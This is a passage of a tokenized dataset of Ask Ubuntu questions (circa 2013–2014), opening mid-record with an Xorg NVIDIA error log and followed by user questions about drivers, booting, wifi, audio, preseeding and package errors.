ii ) loadmodule : `` dri2 '' [ 9.915 ] ( ii ) module `` dri2 '' already built-in [ 9.915 ] ( ii ) loadmodule : `` glamoregl '' [ 9.916 ] ( ii ) loading /usr/lib/xorg/modules/libglamoregl.so [ 10.024 ] ( ii ) module glamoregl : vendor= '' x.org foundation '' [ 10.024 ] compiled for 1.14.3 , module version = 0.5.1 [ 10.024 ] abi class : x.org ansi c emulation , version 0.4 [ 10.024 ] ( ii ) loadmodule : `` glx '' [ 10.024 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 10.071 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 10.071 ] compiled for 4.0.2 , module version = 1.0.0 [ 10.071 ] module class : x.org server extension [ 10.071 ] ( ii ) nvidia glx module 319.60 wed sep 25 14:24:11 pdt 2013 [ 10.071 ] loading extension glx [ 10.071 ] ( ii ) loadmodule : `` nvidia '' [ 10.071 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 10.085 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 10.085 ] compiled for 4.0.2 , module version = 1.0.0 [ 10.085 ] module class : x.org video driver [ 10.091 ] ( ii ) nvidia dlloader x driver 319.60 wed sep 25 14:04:14 pdt 2013 [ 10.091 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 10.092 ] ( ++ ) using vt number 7 [ 10.096 ] ( ii ) loading sub module `` fb '' [ 10.096 ] ( ii ) loadmodule : `` fb '' [ 10.096 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 10.097 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 10.097 ] compiled for 1.14.5 , module version = 1.0.0 [ 10.097 ] abi class : x.org ansi c emulation , version 0.4 [ 10.097 ] ( ww ) unresolved symbol : fbgetgcprivatekey [ 10.097 ] ( ii ) loading sub module `` wfb '' [ 10.097 ] ( ii ) loadmodule : `` wfb '' [ 10.097 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 10.100 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 10.100 ] compiled for 1.14.5 , module version = 1.0.0 [ 10.100 ] abi class : x.org ansi c emulation , version 0.4 [ 10.100 ] ( ii ) loading sub module `` shadow '' [ 10.100 ] ( ii ) loadmodule : `` shadow '' [ 10.100 ] ( ii ) loading /usr/lib/xorg/modules/libshadow.so [ 10.101 ] ( ii ) module shadow : vendor= '' x.org foundation '' [ 10.101 ] compiled for 1.14.5 , module version = 1.1.0 [ 10.101 ] abi class : x.org ansi c emulation , version 0.4 [ 10.101 ] ( ii ) loading sub module `` ramdac '' [ 10.101 ] ( ii ) loadmodule : `` ramdac '' [ 10.101 ] ( ii ) module `` ramdac '' already built-in [ 10.103 ] ( ** ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 10.103 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 10.103 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 10.103 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 10.103 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 10.109 ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia kernel module . please see the [ 10.109 ] ( ee ) nvidia ( 0 ) : system 's kernel log for additional error messages and [ 10.109 ] ( ee ) nvidia ( 0 ) : consult the nvidia readme for details . [ 10.109 ] ( ee ) nvidia ( 0 ) : *** aborting *** [ 10.109 ] ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 [ 10.109 ] ( ii ) unloadmodule : `` nvidia '' [ 10.109 ] ( ii ) unloadsubmodule : `` shadow '' [ 10.109 ] ( ii ) unloadsubmodule : `` wfb '' [ 10.109 ] ( ii ) unloadsubmodule : `` fb '' [ 10.109 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 10.109 ] ( ee ) fatal server error : [ 10.109 ] ( ee ) no screens found ( ee ) [ 10.109 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 10.109 ] ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 10.109 ] ( ee ) [ 10.110 ] ( ee ) server terminated with error ( 1 ) . closing log file . my installed linux kernel and headers ii linux-generic 3.11.0.15.16 amd64 complete generic linux kernel and headers ii linux-headers-3.11.0-15 3.11.0-15.23 all header files related to linux kernel version 3.11.0 ii linux-headers-3.11.0-15-generic 3.11.0-15.23 amd64 linux kernel headers for version 3.11.0 on 64 bit x86 smp ii linux-headers-generic 3.11.0.15.16 amd64 generic linux kernel headers ii linux-image-3.11.0-15-generic 3.11.0-15.23 amd64 linux kernel image for version 3.11.0 on 64 bit x86 smp ii linux-image-extra-3.11.0-15-generic 3.11.0-15.23 amd64 linux kernel extra modules for version 3.11.0 on 64 bit x86 smp ii linux-image-generic 3.11.0.15.16 amd64 generic linux kernel image installed nvidia packages ii nvidia-319-updates 319.60-0ubuntu1 amd64 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-settings-319-updates 319.60-0ubuntu1 amd64 tool for configuring the nvidia graphics driver dmesg http : //paste.ubuntu.com/6681226/
399155	panel problem on toshiba satellite c855-2gd	i 'm currently using ubuntu 12.04 ( lts ) and i 'm facing an issue with this distro . first of all , i 've heard that problems with ubuntu on toshiba satellite laptops often occur . do n't know whether it has something with toshiba drivers or something else , but there are other operational systems facing the problem when installed on a toshiba laptops . i am using a toshiba satellite c855-2gd . with its system components , i see no reason for ubuntu being dysfunctional . however at times , when i download an app from ubuntu software center , during the installation my side and top panel just disappear . then i am unable to do anything ( not even open terminal via ctrl+alt+t ) but to go for that black screen on crtl+alt+f6 and reboot my system . then my panels are back but i 'm bit frustrated that my panels are often missing . just a few moments ago , i downloaded a presentation ( pptx format ) and it happened again ! and it happened a week ago when i was transmitting data from my usb to my laptop ... once i managed to install a wine application on my ubuntu , i tried to run the old game ( diablo 1 ) and the whole system crashed ! can someone please tell me what to do to prevent such problems in future ? and would it somehow help if i upgrade to ubuntu 13.10 ? perhaps there are some features in 13.10 release that i do n't know of and could help with this annoying panel problem ?
399156	unable to connect to internet on ubuntu 13.10 but works fine on windows 7 on same computer	i just installed ubuntu 13.10 alongside windows 7 . everything works perfectly fine except for the internet . in edit connections it just shows an ethernet connection when i boot onto windows 7 the wireless connection works fine but it does n't work in ubuntu . i tried creating a connection but it did n't work either .
399158	specify shared library location for vlc	i built ( from source ) a newer version of libavcodec.so , libavformat.so , etc . than provided by the ubuntu repositories . ( my newer versions are installed in /usr/local/lib ) . using ldd /usr/bin/vlc to list the shared library dependencies of vlc returns a small list : linux-vdso.so.1 = > ( 0x00007fff219fe000 ) libvlc.so.5 = > /usr/lib/libvlc.so.5 ( 0x00007fb0622ca000 ) libvlccore.so.5 = > /usr/lib/libvlccore.so.5 ( 0x00007fb061fe8000 ) libpthread.so.0 = > /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x00007fb061dca000 ) libdl.so.2 = > /lib/x86_64-linux-gnu/libdl.so.2 ( 0x00007fb061bc6000 ) libc.so.6 = > /lib/x86_64-linux-gnu/libc.so.6 ( 0x00007fb0617fe000 ) libdbus-1.so.3 = > /lib/x86_64-linux-gnu/libdbus-1.so.3 ( 0x00007fb0615b8000 ) librt.so.1 = > /lib/x86_64-linux-gnu/librt.so.1 ( 0x00007fb0613b0000 ) libm.so.6 = > /lib/x86_64-linux-gnu/libm.so.6 ( 0x00007fb0610ac000 ) /lib64/ld-linux-x86-64.so.2 ( 0x00007fb062512000 ) notably , libavcodec.so is absent , meaning that vlc finds the library at runtime ( rather than at compile-time ) . is there a way to tell vlc to point to my newer version of libavcodec.so , libavformat.so and other related libraries ( all located in /usr/local/lib ) ? this is because i am trying to use ffmpeg and ubuntu provides libav . libav does n't have an mss2 decoder but ffmpeg does . as long as vlc links to libav , i ca n't play my video files that use mss2 with vlc .
399160	adjust volume sound	how do i adjust the volume of online videos i am watching ? i 've cranked my speakers up . i 've selected the increased volume button on screen . i want to boost my sound . how do i do so , please ?
399165	setting a command to be run when switching to a virtual desktop ( or an activity ) in kde	can a command be set to run when switching to a specific virtual desktop ( or an activity ) in kde environment ? i want to run a command for a desktop ( e.g . desktop2 ) which when i switch to , it will change language layout to english us . so by switching to desktop2 , the language layout will be english us automatically .
399172	weird looking text and icons in top bar	look at `` google - mozilla firefox '' there are ugly pixels around text and icons in top bar and it 's very annoying . it looks like bad antialiasing or something like that .
399175	ubuntu 13.10 desktop black and garbled windows	my desktop is black and every window is garbled . in had to do nomodeset to install because it gave me a black screen when trying to install . i have done a full update to try and remedy the problem . in have 2 amd radeon 7790s in crossfire and fx 8core cpu at 4.6ghz each . 16gb of ram . the unity bar and dash icon are coloured with the default background 's colours but the dash is opaque and so is there unity bar .
399179	how to package executable terminal commands	let 's say i have a downloadable text file on my website that says sudo apt-getupdate how can i make it so that the user downloads it and it auto puts that code into terminal ? what would i do for something that has many lines of code ?
399184	no sound ? ppc g5	i 'm trying to breath new life into my old g5 by installing lubuntu 12.04 . all looks great and is working except the audio . there appears to be no volume control or audio adjustments in the system preferences as if it has n't installed the files . any idea or suggestions most welcome . thanks davyd dual 2 ghz powerpc g5 2 gb ddr2 sdram built in sound card . 1 burr brown pcm3052 2 crystal semiconductor cs84xx
399185	distributed drive on a mixed os network	i 'm building a ubuntu home server and i was going to add a nas to it when i realized the pcs on the network had 6tb of unused storage space so instead i want to combine that space into one virtual shared drive . the problem is that many of those pcs run on windows , could n't find any doc for this situation , is it even possible ?
399186	12.04 : kernel update - stopping system runlevel v compatibility	i recently updated my ubuntu 12.04 . one of them was kernel update to kernel 3.2.0-58 . the problem is that when the update finished it asked to restart my computer , so i did . the computer went into boot and after about 20 seconds a black screen with white words came up . messages that followed were stopping system runlevel v compatibility and stopping save kernel message . how to fix this ?
399188	“the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present”	i have tried the solution as presented here what to do about `` the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present '' ? as well as its original source http : //punygeek.blogspot.com/2012/10/ubuntu-1204-how-to-solve-disk-drive-for.html here several times . what 's happening is that every time i reformat my linux-swap with gparted , it works perfectly well as long as my session lasts . whenever i reboot , the swap partition becomes `` unknown '' as displayed in gparted , needless to say “the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present” is still present .
399190	nvidia driver cripples my laptop ubuntugnome 13.10	okay so repeating my problem aggain : i have a dell xps 17 ( l702x ) laptop with a nvidia geforce 555m graphics card inside running ubuntugnome 13.10 . since my batterytime is amazingly small ( 2 hours on a 9 cell batery which gives 10-12 hours in windows ) i tried to install the latest nvidia driver for my card in hopes of being able to use the integrated graphics instead of the dedicated card all the time ( fan noices are so annoying ) , here comes the trouble ! after installing driver 331.20 using these commands : sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-331 i restarted my laptop and then i came to this loadingscreen where everything just stopped . official_by_aldomann-d6k2mof.png '' > http : //th04.deviantart.net/fs70/300w/f/2013/240/1/2/ubuntu_gnome_13_10_plymouth_theme_official_by_aldomann-d6k2mof.png first time around i held the powerbutton and tried again and when i realised it did'nt work i reinstalled my system ! after setting all up i tried same thing again but came to same conclusion , though this time i realized i could go `` ctrl + alt + f2 '' to get a terminal where i basicly ran sudo apt-get purge `` and then all installed nvidiacomponents '' followed by startx and i was back to `` normal '' ... after this i tried also instead of sudo apt-get install nvidia-331 to go sudo apt-get install nvidia-current but unfortunatly with same result . does anyone know if i can fix this problem somehow ? it is really annoying to have my battery drained in a couple of hours when i know what it is capable of..
399192	does ubuntu apt eliminate the need of backporting ( as described by redhat ) ?	i see backporting mentioned below . https : //access.redhat.com/site/security/updates/backporting/ i 'm not sure what they mean by `` module '' . for the example scenario mentioned in the link , it sounds that , in ubuntu , if users only use packages managed by apt , there is no need to backport packages in the sense that redhat means . is it so ? thanks .
399193	nvidia 331.20 x server not starting in lightdm	before installing the new nvidia 331.20 drivers on my ubuntu 12.04 32bit i decided to update the kernel to 3.12.6 then i start to run the nvidia update script . so i switched to terminal mode turned off lightdm sudo service lightdm stop then seeing that i tried installing nvidia 319 in the past purged nvidia* sudo apt-get purge nvidia* may not have been the smartest idea , unhindered i decided to run the script anyway sudo sh nvidia* after clicking next to the prompts , i got a warning about not being able to install to the dkms so using the prompt options decided to not add it to the dkms `` cause why not ! famous last words '' . then i got an error about not being able to install `` unified memory kernal '' so i just ran the script with the option -- no-unified-memory and success i rebooted . the startup looked great ... then the screen looks like a netbook 640x480 . so i open nvidia x server only to find nvidia is not being used run nvidia-xconfig restart lightdm and still no luck . i do know how to revert back to the nvidia 304 but i would like to get the new nvidia drivers working . all help is appreciated does anyone knowhow to add nvidia to the dkms or would that be a waste of time ?
399194	how to preseed installing grub to a device during installation without prompt ?	i am trying to do a fully automated ubuntu preseed installation . i am stuck because i can not preseed the answer to installing grub on a device other than /dev/sda without having to manually hit `` enter '' to continue the installation . it says : [ ! ] install grub boot loader on a hard disk and correctly selects the device i am attempting to install the boot loader onto , but it still requires me to manually hit enter . you can see an image of it here : http : //i.imgur.com/lwvahwv.png i 've tried various combinations of the following values in my preseed , all of them have the same end result : # option 1 ( works when installing to /dev/sda . prompts with sdm ) d-i grub-installer/only_debian boolean true d-i grub-installer/with_other_os boolean true # option 2 d-i grub-installer/only_debian boolean true d-i grub-installer/with_other_os boolean true d-i grub-installer/bootdev string /dev/sdm # option 3 d-i grub-installer/only_debian boolean false d-i grub-installer/with_other_os boolean false d-i grub-installer/bootdev string /dev/sdm # option 2 d-i grub-installer/only_debian boolean true d-i grub-installer/with_other_os boolean true d-i grub-installer/bootdev string /dev/sdm i 've also tried adding the following : d-i grub-pc/install_devices multiselect /dev/sdm regardless of these settings i get the prompt . i turned on the logs to verbose during installation . the logs show this when i am stopped with the prompt : dec 9 07:30:35 debconf : -- > set grub-installer/bootdev /dev/sdm dec 9 07:30:35 debconf : < -- 0 value set dec 9 07:30:35 debconf : -- > progress step 1 dec 9 07:30:35 debconf : < -- 0 ok dec 9 07:30:35 debconf : -- > progress info grub-installer/progress/step_bootdev dec 9 07:30:35 debconf : < -- 0 ok dec 9 07:30:35 debconf : -- > input critical grub-installer/bootdev dec 9 07:30:35 debconf : < -- 0 question will be asked dec 9 07:30:35 debconf : -- > go if i hit enter and the installations continues , it goes on to this : dec 9 07:30:35 debconf : -- > set grub-installer/bootdev /dev/sdm dec 9 07:30:35 debconf : < -- 0 value set dec 9 07:30:35 debconf : -- > progress step 1 dec 9 07:30:35 debconf : < -- 0 ok dec 9 07:30:35 debconf : -- > progress info grub-installer/progress/step_bootdev dec 9 07:30:35 debconf : < -- 0 ok dec 9 07:30:35 debconf : -- > input critical grub-installer/bootdev dec 9 07:30:35 debconf : < -- 0 question will be asked dec 9 07:30:35 debconf : -- > go dec 9 07:37:20 debconf : < -- 0 ok dec 9 07:37:20 debconf : -- > get grub-installer/bootdev dec 9 07:37:20 debconf : < -- 0 /dev/sdm dec 9 07:37:20 debconf : -- > progress step 1 dec 9 07:37:20 debconf : < -- 0 ok dec 9 07:37:20 debconf : -- > subst grub-installer/progress/step_install_loader bootdev /dev/sdm dec 9 07:37:20 debconf : adding [ bootdev ] - > [ /dev/sdm ] dec 9 07:37:20 debconf : < -- 0 dec 9 07:37:20 debconf : -- > progress info grub-installer/progress/step_install_loader dec 9 07:37:20 debconf : < -- 0 ok dec 9 07:37:20 grub-installer : info : installing grub on '/dev/sdm' dec 9 07:37:20 grub-installer : info : grub-install supports -- no-floppy dec 9 07:37:20 grub-installer : info : running chroot /target grub-install -- no-floppy -- force `` /dev/sdm '' dec 9 07:37:22 grub-installer : installation finished . no error reported . dec 9 07:37:22 grub-installer : info : grub-install ran successfully ... it 's not clear to me exactly what the prompt is . is it this ? dec 9 07:37:20 debconf : < -- 0 ok if that 's the case , how do i input an `` ok '' ? any help is greatly appreciated .
399195	how do i setup a ldap-backed irc server ?	how can i configure an irc server that is backed by ldap ? right now , i 'm looking at making an irc server that is backed by an openldap or 389 instance for user authentication . which ircd should i be using ? preferably , it should be able to look up the users ldap groups and decide if they can be opped , voiced , or even allowed to join a channel at all .
399196	making external drive accessible from ubuntu	i wish to connect my wd 2tb drive to a humax hd-foxt2 to play files created on ubuntu . if i format the drive fat32 no problems , except the restrictions of file size of fat32 is a problem , and the humax apparently uses ext3 format . so i formatted the drive in ext3 using ubuntu , but humax does n't recognize it now . so i reformatted the drive using the humax ext3 . the humax device now recognizes it but ubuntu says i do not have permission to write to it then .
399198	why does n't `exec startx` work in 13.10 ?	i am used to being able to launch a second x session in tty8 with exec startx but instead i 'm getting an error : x : user not authorized to run the x server , aborting . and then in tty 8 i end up with a stuck cursor and no login at all . just the blinking cursor in the very top left . how to i kick up a second x server so that i can log in as another user there ? update with help in the comments , i 've gotten somewhat farther . from the terminal in an existing xsession , i can do exec sudo startx to get a new x session in tty8 , logged in as that user . if i hop to tty4 , log in and do exec startx i can get a session , too . here 's what still is n't working : the session i get is a a working x session but without any launcher , top bar or unity window management . so ctrlaltt gives me a terminal and i can launch applications from there , but i ca n't switch between them and if i minimize a window there 's no way to get it back .
399202	dual monitor vertical desktop icons alignment	i 'm currently running ubuntu 13.10 . i have an nvidia graphic card and two monitors ( vga and dvi ) . the monitor i use as the main one is on the right , and the launcher is indeed on this screen . the problem though is that the desktop icons are aligned on the left screen ( the secondary one ) , and this is very annoying . i 'd like to have the desktop icons aligned on the right ( main ) screen . i am using mdm as desktop environment but i would n't mind changing it to solve this issue ( i currently tried mdm , lightdm , gnome ) with no success . i googled the issue a lot , and i only found old threads that basically stated that it 's impossible , but hopefully someone has some good news for me . thanks
399207	wierd noise at greeter	using ubuntu 13.10 . at every startup , immediately after i log in on the greeter , i hear a strange very short `` glitching '' sound . i am quite lost here , and this is the only thing that might somehow be helpful : with lightdm , i hear this sound two times : one time immediately before the greeter is displayed ( i mean when the screen is still totally black ) , and the second time immediately after i login , with gnome it 's the same . with mdm it only happens once , after i login . it 's quite a pain since i always leave my speakers on .
399208	wsjt software on 12.04 verses version 10	dear support ubuntu support community : i recently upgraded my pc from ubuntu version 10.04 to 12 . i had a program running under 10.04 called wsjt ; it was installed via synaptic pkg mgr . after i upgraded to version 12.04 , when i run wsjt from the command line , or via the graphical user interface , the program starts , seems to come all the way up and then , collapses . is there anything i can do to keep the wsjt running ? it is a most excellent program . please let me know and thank you .
399211	is enabling trim on an encrypted ssd a security risk ?	i recently installed ubuntu 13.10 on an ssd drive using the `` encrypt the new ubuntu installation for security '' option . i wanted to enable trim , so was following the guide provided here . one step says to add the discard option to /etc/crypttab . however , the crypttab man page somewhat vaguely states : warning : assess the specific security risks carefully before enabling this option . for example , allowing discards on encrypted devices may lead to the leak of information about the ciphertext device ( filesystem type , used space etc . ) if the discarded blocks can be located easily on the device later . what exactly are the security risks of enabling trim on an encrypted ssd partion/drive ?
399214	new laptop stopped booting after a good week ( 13.10 ) ( solved )	so far i always could solve my problems by reading through questions already asked but this time i ca n't find any prescedental case , so here we go : i got a new laptop for christmas , immediately installed ubuntu 13.10 and changed the windowmanager to i3 . no dual boot , nothing fancy , just ubuntu and i3 . today it suddenly stopped booting after working just fine for about a week . it gets to the ubuntu-loading screen and the loading-animation works , but i waited for severeal minutes and nothing happens . i checked the boot-options , they are fine . aside from that i know neither what to test nor what could be the problem . any ideas ? edit : i totally forgot the option to try booting into recovery mode . did n't solve the problem , but now i know , that the last thing it tries to do is resume : libgcrypt version 1.5.0 that 's where the screen freezes for about two or three minutes . then it says : resume : could not stat hte resume device file '/dev/dm-0' please type in the full path name to try again or press enter to boot the system : it reacts to nothing after that .
399221	comic book project using all open source apps	i wanted to know if it is ok to display the ubuntu logo in my new comic book . i used ubuntu , gimp , and inkscape and wanted to promote them in my project .
399222	new user of ubuntu , no audio	just started dual booting ubuntu with windows , everything works fine except for audio : no start up sound , no audio in youtube , no audio from local audio files , nothing . is this a common problem ?
399223	crontab entry to reboot than email	i got my weekly crontab reboot entry to work using /sbin/shutdown -r but now i want it to email me when the reboot happens . ideally i would like the email to happen after it rebooted so i know the server came up okay . thanks
399227	how to setup geary with imap and ssl/tls encription ?	i tried imap setting as pop3 with port 110 with my email id and password and both starttls and as encryption ssl/tls but it says imap setting not valid . similarly , i put smtp with port 25 with same settings above . i got an error which says unable to validate : imap connection error and smtp connection error . but the surprising thing is the same setting above worked on thunderbird .
399229	two startup applications icons with cinnamon	after installing cinnamon , many settings were duplicated such as `` power '' , `` screensaver '' , etc . i was able to remove most of it with sudo apt-get purge gnome-control-center . `` startup applications '' is still duplicated . how do i remove the gnome version ?
399230	computer crashes after i install nvidia drivers	i am still using my hp touchsmart and i installed steam along with gmod , the performance was lacking so i went to update the nvidia drivers . when my computer booted back up the boot up screen was pixelated ( a nvidia logo appeared for a second ) and all the text was enlarged , after i logged in the system crashed in just a minute or two . this computer has a geforce 9300m gs for its graphics card and i am running kubuntu 13.04
399232	i cant boot ubuntu	i recently nuked my laptop with dban so i can install ubuntu . i put the disk and it shows ubuntu and let me choose install or test it out but no matter what is choose it stays at the ubuntu loading screen but never loads up .
399233	is there voice recognition for ubuntu 12.04 ?	i am wondering , after some research to no avail , is there a reliable `` voice recognition '' system supported by 12.04 ? please help !
399234	blackscreen after upgrading to 13.10 from 13.04	i have a black screen issue on boot after upgrading from 13.04 to 13.10 without nomodeset kernel option . i am using intel hd4000 gfx and i have installed intel gfx driver . with nomodeset kernel option , i do n't have black screen but video performance is not good . thank you for any help .
399235	attachments opening and wirless connections	i need help with wireless connection on my laptop and attachment opening at the bottom of the screen without it disappearing.bad request your browser sent a request that this server could not understand . size of a request header field exceeds server limit .
399237	getting error while installing any software or updating in ubuntu 12.04	while installing anything or updating i get this error `` the installation or removal of a software package failed . '' and details are below : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 445343 files and directories currently installed . ) preparing to replace qbittorrent 3.1.x-0~4612-20131231~ubuntu12.04.1 ( using ... /qbittorrent_3.1.x-0~4619-20140103~ubuntu12.04.1_i386.deb ) ... unpacking replacement qbittorrent ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for menu ... processing triggers for hicolor-icon-theme ... processing triggers for man-db ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up isc-dhcp-server ( 4.1.esv-r4-0ubuntu5.9 ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory /var/lib/dpkg/info/isc-dhcp-server.config : 10 : /etc/default/isc-dhcp-server : separate : not found dpkg : error processing isc-dhcp-server ( -- configure ) : subprocess installed post-installation script returned error exit status 127 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of dhcp3-server : dhcp3-server depends on isc-dhcp-server ; however : package isc-dhcp-server is not configured yet . dpkg : error processing dhcp3-server ( -- configure ) : dependency problems - leaving unconfigured setting up qbittorrent ( 3.1.x-0~4619-20140103~ubuntu12.04.1 ) ... no apport report written because maxreports is reached already processing triggers for menu ... errors were encountered while processing : isc-dhcp-server dhcp3-server error in function : setting up isc-dhcp-server ( 4.1.esv-r4-0ubuntu5.9 ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory /var/lib/dpkg/info/isc-dhcp-server.config : 10 : /etc/default/isc-dhcp-server : separate : not found dpkg : error processing isc-dhcp-server ( -- configure ) : subprocess installed post-installation script returned error exit status 127 dpkg : dependency problems prevent configuration of dhcp3-server : dhcp3-server depends on isc-dhcp-server ; however : package isc-dhcp-server is not configured yet . dpkg : error processing dhcp3-server ( -- configure ) : dependency problems - leaving unconfigured while in actual software gets installed but gives the above error . i am using ubuntu 12.04 with gnome shell .
399239	running commands for wifi at startup	i have just found a way to get my wifi to work using these commands : sudo rmmod iwldvm sudo rmmod iwlwifi sudo modprobe iwlwifi bt_coex_active=0 i would rather not type these in every time i log onto my computer . i was wondering how i might get these commands to run automatically when i log in . i am running ubuntu 12.04 lts . thanks for any help !
399241	can not install 13.10 past initial setup	i have an hp pavilion g7 . intel i3 2.2ghz , windows 7 home premium ( 64bit ) , 4gb ram , 600gb hd . trying to install ubuntu 13.10 along side win7 . will happily provide more info if needed . booting from ubuntu 13.10 bootable dvd ubuntu splash screen comes up ( i have to manually brighten the screen with the f3 key ) gui/drivers seem to work fine ( wifi/mouuse/display/audio ) select language-english-install ubuntu preparing to install ubuntu green checks for at least 5.9gb free space , plugged in , connected to internet ( wifi ) i check box download updates while installing and install this 3rd party software installation type : install ubuntu inside windows 7 this is where it fails . the dvd ejects , black screen and the following message appears : acpid : exiting speech-dispatcher disabled ; edit /etc/default/speech-dispatcher *asking all remaining processes to terminate [ ok ] nothing happens after this so i strike the enter key and the machine reboots . plz help !
399242	wiped out osx ( mac air ) , to install ubuntu 13.10 which does n't boot	what are my options ? i tried to do a osx recovery , but now the macbook air ca n't pick up my wireless ( but wireless is definitely working ) . at this point , i 'd be happy with either ubuntu , osx , or any linux distro working . thanks
399246	ubuntu 13.10 upgrade low graphics failure	running 13.10 on older hp pavilion with nvidia g86m [ geforce 8600 gs ] chip . i was using nvidia driver before update . after update , no gui possible . even low graphics mode is in loop of trying to run , but still crashes . can get into tty only . need to change driver to generic or older nvidia version . once up an running into gui , should be able to repair .
399247	reduce laptop screen brigtness below minimum	this is not duplicate of http : //superuser.com/questions/560445/dim-screen-past-the-minimum-on-ubuntu . i have already tried the solution mentioned in the above article . my laptop configuration is dell inspiron 1440 . i wanted to reduce my laptop screeen brightness in ubuntu below the minimum level that can be set using system settings . i usually set my screen brightness to an ultra low level , as it hurts my eyes . i have already searched for the solution online and found related posts http : //superuser.com/questions/323476/can-i-fine-tune-my-screen-brightness decrease backlight below minimum http : //superuser.com/questions/560445/dim-screen-past-the-minimum-on-ubuntu decrease backlight below minimum the problem is that in my case the screen brightness value in the file /sys/class/backlight/acpi_video0/brightness is already 0 . i have tried installing backlight and setting it to 0 , and overwriting the value again as described in one of the posts above . however , none of it helps . i am currently using the latest version of ubuntu 13.10 . any help is highly appreciated . thanks ,
399248	a command for showing desktop	wmctrl -s can be used to switch between virtual desktops . is there a command that shows the desktop ? that is a command that will switch between minimizing all windows and restoring them ?
399251	locate cmd how to ignore the windows directory	i run a ubuntu box on my pc , and the ubuntu is install as dual-system , i mean the pc have a ubuntu and a win7 . so i use the locate command to find a file , it often list a lot files existing in windows system , for example , it usually list some content under /host/.. , those is under windows . thus not only time consuming , but also make me not easy find what i want . my question is : how to set the parameter of locate command and avoid such a problem ? make the locate cmd just find files under linux directory ?
399256	unable to boot ubuntu server after update/upgrade	relatively new to linux but have been running an ubuntu webserver problemfree for about a year now . however , after running sudo apt-get update sudo apt-get upgrade it complained about being unable to upgrade due to a package and suggested me to run the same command with the -f flag , so i did . did n't help , still complained about a broken package . anyway , i restarted the whole computer using sudo shutdown -r now and now it is unable to complete a boot up . it gets stuck at stopping set console keymap stopping configure virtual network devices and then nothing happens no matter how long i wait . what has happened and how can i fix this ? would prefer not reinstalling the whole system . thankful for help ! screenshot :
399260	ubuntu 13.10 intel centrino wireless-n 2230 stopped working after reboot	when i rebooted my laptop , i got a screen during the middle saying something about `` d/iwlwifi.cong '' and `` bad line starting with options , '' then when it fully started , i could n't connect to my network wirelessly . i rebooted twice , same thing happened both times . i had uninstalled a few packages before the first reboot , so i reinstalled them . after reinstalling then rebooting , still could n't connect to wifi . i tried to hook up a wireled connection , but it did n't work . about an hour later , the wired connection just started working . now when trying to connect to wireless , it asks for the authentication several times , then disconnects .
